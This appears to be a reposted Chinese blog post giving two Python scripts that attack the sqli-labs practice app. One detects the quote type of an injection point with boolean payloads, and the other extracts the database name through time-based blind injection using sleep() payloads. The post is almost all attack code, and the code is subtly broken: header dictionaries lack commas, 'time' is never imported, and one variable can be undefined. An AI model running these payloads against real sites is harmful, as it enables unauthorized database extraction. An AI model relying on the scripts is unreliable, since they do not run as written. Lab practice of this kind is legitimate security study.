投稿
  1. 首页
  2. 随笔

SQL注入有关的python脚本编写

e3982022-12-17随笔阅读44

SQL注入有关的python脚本编写,第1张

SQL注入有关的python脚本编写 
#### 判断是否为整形注入
import requests
import re
header={
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,**;q=0.8"
	"Accept-Encoding": "gzip, deflate, br"
	"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2"
	"Connection": "keep-alive"
	"cookie": "Hm_lvt_dd4738b5fb302cb062ef19107df5d2e4=1635672302,1635903472,1636200072,1637395585"
	"Host": "newtab.firefoxchina.cn"
	"Sec-Fetch-Dest": "document"
	"Sec-Fetch-Mode": "navigate"
	"Sec-Fetch-Site": "cross-site"
	"Upgrade-Insecure-Requests": "1"
	"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0"
}
def is_quotes_inj(url):
    quotes= ["'",'"',")","')",'")']
    for quote in quotes:
        true_url=url+quote+"%20and 1=1"+"--+"
        fasle_url=url+quote+"%20and 1=2"+"--+"
        url_responese=requests.get(url,headers=header)
        true_url_response = requests.get(true_url,headers=header)
        fasle_url_response = requests.get(fasle_url,headers=header)
        if true_url_response.text!=fasle_url_response.text and fasle_url_response.text!=url_responese.text and url_responese.text==true_url_response.text :
            print("this is a {} type of sql injection!".format(quote))
            t=True
        else :
            print(true_url)
    if t:
        return True
    else:
        return False
url="http://192.168.66.128/sqli-labs-master/Less-10/?id=1"
is_quotes_inj(url)

#### 盲注获取数据
import requests
import re
header={
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,**;q=0.8"
	"Accept-Encoding": "gzip, deflate, br"
	"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2"
	"Connection": "keep-alive"
	"cookie": "Hm_lvt_dd4738b5fb302cb062ef19107df5d2e4=1635672302,1635903472,1636200072,1637395585"
	"Host": "newtab.firefoxchina.cn"
	"Sec-Fetch-Dest": "document"
	"Sec-Fetch-Mode": "navigate"
	"Sec-Fetch-Site": "cross-site"
	"Upgrade-Insecure-Requests": "1"
	"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0"
}
chars="abcdefghijklmnopqrstuvwzxyABCDEFGHIJKLMNOPQRSTUVWZYZ0123456789~!@#$%^&*()_+<>?"
url="http://192.168.66.128/sqli-labs-master/Less-8/?id=1"
length_payload="' and if(length(database())={},sleep(3),0)--+"
data_payload="' and if(ascii(substr(database(),{},1))={},sleep(3),0)--+"
def get_length(url,length_payload):
    for x in range(1,50):
        ex_url=url+length_payload.format(x)
        start=time.time()
        response = requests.get(ex_url,headers=header)
        end=time.time()
        print(end-start)
        if (end-start) > 2 :
            print("长度是"+str(x))
            return x
length=get_length(url,length_payload)
def get_data(url,data_payload,length):
    data=""
    for x in range(1,length+1):
        for char in chars:
            ex_url=url+data_payload.format(x,ord(char))
            start=time.time()
            response = requests.get(ex_url,headers=header)
            end=time.time()
            if (end-start) > 2 :
                data += char
                print("数据是"+data)
    return data
name=get_data(url,data_payload,length)
print(name)

欢迎分享,转载请注明来源:内存溢出

原文地址:https://54852.com/zaji/5700903.html

(0)
打赏 微信扫一扫微信扫一扫 支付宝扫一扫支付宝扫一扫
e398e398一级用户组
00
上一篇 2022-12-17
下一篇2022-12-17

发表评论

登录后才能评论

评论列表(0条)

    保存